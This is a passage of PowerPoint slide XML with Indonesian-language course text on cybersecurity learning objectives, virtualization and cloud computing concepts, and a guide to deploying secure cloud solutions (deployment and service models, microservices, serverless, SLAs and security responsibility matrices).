              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompetensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaminan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221060494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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Solusi Cloud yang Aman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang di-host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hibrida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyesuaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>orkestrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Manfaat dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SLA dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>matriks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas-tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
